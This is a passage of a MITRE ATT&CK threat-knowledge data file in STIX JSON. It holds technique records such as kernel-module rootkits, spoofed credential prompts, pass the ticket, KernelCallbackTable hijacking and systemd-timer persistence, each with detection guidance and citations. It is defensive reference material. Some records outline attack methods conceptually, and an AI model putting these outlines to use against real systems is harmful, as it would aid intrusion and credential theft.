Microsoft SharePoint, GitHub, and AWS S3) support the direct download of files, emails, source code, and other sensitive information via the web console or [Cloud API](https://attack.mitre.org/techniques/T1059/009).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["William Cain", "Alfredo Abarca"], "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Office 365", "SaaS", "IaaS", "Google Workspace", "Network"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "x_mitre_network_requirements": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", "created": "2017-05-31T21:30:44.720Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1048", "external_id": "T1048"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Palo Alto OilRig Oct 2016", "description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.", "url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"}, {"source_name": "20 macOS Common Tools and Techniques", "description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.", "url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Kernel Modules and Extensions", "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)\u00a0\n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide)\u00a0Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload and kextunload commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)\n\nSince macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as \"Legacy System Extensions\" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)\n\nAdversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Wayne Silva, F-Secure Countercept", "Anastasios Pingios", "Jeremy Galloway", "Red Canary", "Eric Kaiser @ideologysec"], "x_mitre_deprecated": false, "x_mitre_detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly.\u00a0These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\n\nOn macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike\u2019s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)\n", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Linux"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", "created": "2020-01-24T17:42:23.339Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/006", "external_id": "T1547.006"}, {"source_name": "Apple Developer Configuration Profile", "description": "Apple. (2019, May 3). Configuration Profile Reference. Retrieved September 23, 2021.", "url": "https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf"}, {"source_name": "Apple Kernel Extension Deprecation", "description": "Apple. (n.d.). Deprecated Kernel Extensions and System Extension Alternatives. Retrieved November 4, 2020.", "url": "https://developer.apple.com/support/kernel-extensions/"}, {"source_name": "System and kernel extensions in macOS", "description": "Apple. (n.d.). System and kernel extensions in macOS. Retrieved March 31, 2022.", "url": "https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web"}, {"source_name": "GitHub Reptile", "description": "Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018.", "url": "https://github.com/f0rb1dd3n/Reptile"}, {"source_name": "Volatility Phalanx2", "description": "Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.", "url": "https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html"}, {"source_name": "iDefense Rootkit Overview", "description": "Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved April 6, 2018.", "url": "http://www.megasecurity.org/papers/Rootkits.pdf"}, {"source_name": "Linux Loadable Kernel Module Insert and Remove LKMs", "description": "Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.", "url": "http://tldp.org/HOWTO/Module-HOWTO/x197.html"}, {"source_name": "CrowdStrike Linux Rootkit", "description": "Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit. Retrieved December 21, 2017.", "url": "https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/"}, {"source_name": "GitHub Diamorphine", "description": "Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.", "url": "https://github.com/m0nad/Diamorphine"}, {"source_name": "Securelist Ventir", "description": "Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.", "url": "https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/"}, {"source_name": "User Approved Kernel Extension Pike\u2019s", "description": "Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading\u2026. Retrieved September 23, 2021.", "url": "https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/"}, {"source_name": "Linux Kernel Module Programming Guide", "description": "Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.", "url": "http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html"}, {"source_name": "Linux Kernel Programming", "description": "Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.", "url": "https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf"}, {"source_name": "Trend Micro Skidmap", "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/"}, {"source_name": "Purves Kextpocalypse 2", "description": "Richard Purves. (2017, November 9). MDM and the Kextpocalypse . Retrieved September 23, 2021.", "url": "https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/"}, {"source_name": "RSAC 2015 San Francisco Patrick Wardle", "description": "Wardle, P. (2015, April). Malware Persistence on OS X Yosemite. Retrieved April 6, 2018.", "url": "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf"}, {"source_name": "Synack Secure Kernel Extension Broken", "description": "Wardle, P. (2017, September 8). High Sierra\u2019s \u2018Secure Kernel Extension Loading\u2019 is Broken. Retrieved April 6, 2018.", "url": "https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/"}, {"source_name": "Wikipedia Loadable Kernel Module", "description": "Wikipedia. (2018, March 17). Loadable kernel module. Retrieved April 9, 2018.", "url": "https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-15T23:39:31.474Z", "name": "GUI Input Capture", "description": "Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)).\n\nAdversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citation: Spoofing credential dialogs) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015)(Citation: Spoofing credential dialogs) On Linux systems adversaries may launch dialog boxes prompting users for credentials from malicious shell scripts or the command line (i.e. [Unix Shell](https://attack.mitre.org/techniques/T1059/004)).(Citation: Spoofing credential dialogs)\n\nAdversaries may also mimic common software authentication requests, such as those from browsers or email clients. This may also be paired with user activity monitoring (i.e., [Browser Information Discovery](https://attack.mitre.org/techniques/T1217) and/or [Application Window Discovery](https://attack.mitre.org/techniques/T1010)) to spoof prompts when users are naturally accessing sensitive sites/data.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "collection"}, {"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Matthew Molyett, @s1air, Cisco Talos"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials. For example, command/script history including abnormal parameters (such as requests for credentials and/or strings related to creating password prompts) may be malicious.(Citation: Spoofing credential dialogs) \n\nInspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a2029942-0a85-4947-b23c-ca434698171d", "created": "2020-02-11T18:58:45.908Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1056/002", "external_id": "T1056.002"}, {"source_name": "LogRhythm Do You Trust Oct 2014", "description": "Foss, G. (2014, October 3). Do You Trust Your Computer?. Retrieved December 17, 2018.", "url": "https://logrhythm.com/blog/do-you-trust-your-computer/"}, {"source_name": "Spoofing credential dialogs", "description": "Johann Rehberger. (2021, April 18). Spoofing credential dialogs on macOS Linux and Windows. Retrieved August 19, 2021.", "url": "https://embracethered.com/blog/posts/2021/spoofing-credential-dialogs/"}, {"source_name": "OSX Keydnap malware", "description": "Marc-Etienne M.Leveille. (2016, July 6). New OSX/Keydnap malware is hungry for credentials. Retrieved July 3, 2017.", "url": "https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/"}, {"source_name": "Enigma Phishing for Credentials Jan 2015", "description": "Nelson, M. (2015, January 21). Phishing for Credentials: If you want it, just ask!. Retrieved December 17, 2018.", "url": "https://enigma0x3.net/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/"}, {"source_name": "OSX Malware Exploits MacKeeper", "description": "Sergei Shevchenko. (2015, June 4). New Mac OS Malware Exploits Mackeeper. Retrieved July 3, 2017.", "url": "https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Pass the Ticket", "description": "Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.\n\nIn this technique, valid Kerberos tickets for [Valid Accounts](https://attack.mitre.org/techniques/T1078) are captured by [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). A user's service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access. (Citation: ADSecurity AD Kerberos Attacks) (Citation: GentilKiwi Pass the Ticket)\n\nSilver Tickets can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint). (Citation: ADSecurity AD Kerberos Attacks)\n\nGolden Tickets can be obtained for the domain using the Key Distribution Service account KRBTGT account NTLM hash, which enables generation of TGTs for any account in Active Directory. (Citation: Campbell 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ryan Becwar", "Vincent Le Toux"], "x_mitre_detection": "Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.\n\nEvent ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to \"Integrity check on decrypted field failed\" and indicates misuse by a previously invalidated golden ticket. (Citation: CERT-EU Golden Ticket Protection)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_system_requirements": ["Requires Microsoft Windows as a target system and Kerberos authentication enabled."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a257ed11-ff3b-4216-8c9d-3938ef57064c", "created": "2017-05-31T21:31:11.623Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1097", "external_id": "T1097"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/645.html", "external_id": "CAPEC-645"}, {"source_name": "ADSecurity AD Kerberos Attacks", "description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.", "url": "https://adsecurity.org/?p=556"}, {"source_name": "GentilKiwi Pass the Ticket", "description": "Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.", "url": "http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos"}, {"source_name": "Campbell 2014", "description": "Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.", "url": "http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf"}, {"source_name": "CERT-EU Golden Ticket Protection", "description": "Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016, April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.", "url": "https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2021-10-17T16:17:55.499Z", "name": "Tool", "description": "Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)\n\nAdversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["SOCCRATES", "Mnemonic AS"], "x_mitre_detection": "In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0", "created": "2020-10-01T02:08:33.977Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1588/002", "external_id": "T1588.002"}, {"source_name": "Recorded Future Beacon 2019", "description": "Recorded Future. (2019, June 20). Out of the Blue: How Recorded Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.", "url": "https://www.recordedfuture.com/identifying-cobalt-strike-servers/"}, {"source_name": "Analyzing CS Dec 2020", "description": "Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.", "url": "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Exfiltration over USB", "description": "Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["William Cain"], "x_mitre_detection": "Monitor file access on removable media. Detect processes that execute when removable media are mounted.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Presence of physical medium or device"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", "created": "2020-03-11T13:50:11.467Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1052/001", "external_id": "T1052.001"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-11T14:00:00.188Z", "name": "KernelCallbackTable", "description": "Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.(Citation: Windows Process Injection KernelCallbackTable)\n\nAn adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.\n\nA pointer to the memory address of the KernelCallbackTable can be obtained by locating the PEB (ex: via a call to the NtQueryInformationProcess() [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the KernelCallbackTable can be duplicated, and a function in the table (e.g., fnCOPYDATA) set to the address of a malicious payload (ex: via WriteProcessMemory()). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)\n\nThe tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the KernelCallbackTable may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the KernelCallbackTable to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious behaviors that could relate to post-compromise behavior.\n\nMonitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances. for known bad sequence of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as WriteProcessMemory() and NtQueryInformationProcess() with the parameter set to ProcessBasicInformation may be used for this technique.(Citation: Lazarus APT January 2022)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a4657bc9-d22f-47d2-a7b7-dd6ec33f3dde", "created": "2022-02-25T15:27:44.927Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1574/013", "external_id": "T1574.013"}, {"source_name": "Lazarus APT January 2022", "description": "Saini, A. and Hossein, J. (2022, January 27). North Korea\u2019s Lazarus APT leverages Windows Update client, GitHub in latest campaign. Retrieved January 27, 2022.", "url": "https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/"}, {"source_name": "FinFisher exposed ", "description": "Microsoft Defender Security Research Team. (2018, March 1). FinFisher exposed: A researcher\u2019s tale of defeating traps, tricks, and complex virtual machines. Retrieved January 27, 2022.", "url": "https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/"}, {"source_name": "Windows Process Injection KernelCallbackTable", "description": "odzhan. (2019, May 25). Windows Process Injection: KernelCallbackTable used by FinFisher / FinSpy. Retrieved February 4, 2022.", "url": "https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/"}, {"source_name": "NtQueryInformationProcess", "description": "Microsoft. (2021, November 23). NtQueryInformationProcess function (winternl.h). Retrieved February 4, 2022.", "url": "https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Search Closed Sources", "description": "Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)\n\nAdversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", "created": "2020-10-02T17:01:42.558Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1597", "external_id": "T1597"}, {"source_name": "D3Secutrity CTI Feeds", "description": "Banerd, W. (2019, April 30). 10 of the Best Open Source Threat Intelligence Feeds. Retrieved October 20, 2020.", "url": "https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/"}, {"source_name": "ZDNET Selling Data", "description": "Cimpanu, C. (2020, May 9). A hacker group is selling more than 73 million user records on the dark web. Retrieved October 20, 2020.", "url": "https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-09-08T11:56:26.862Z", "name": "Systemd Timers", "description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)\n\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 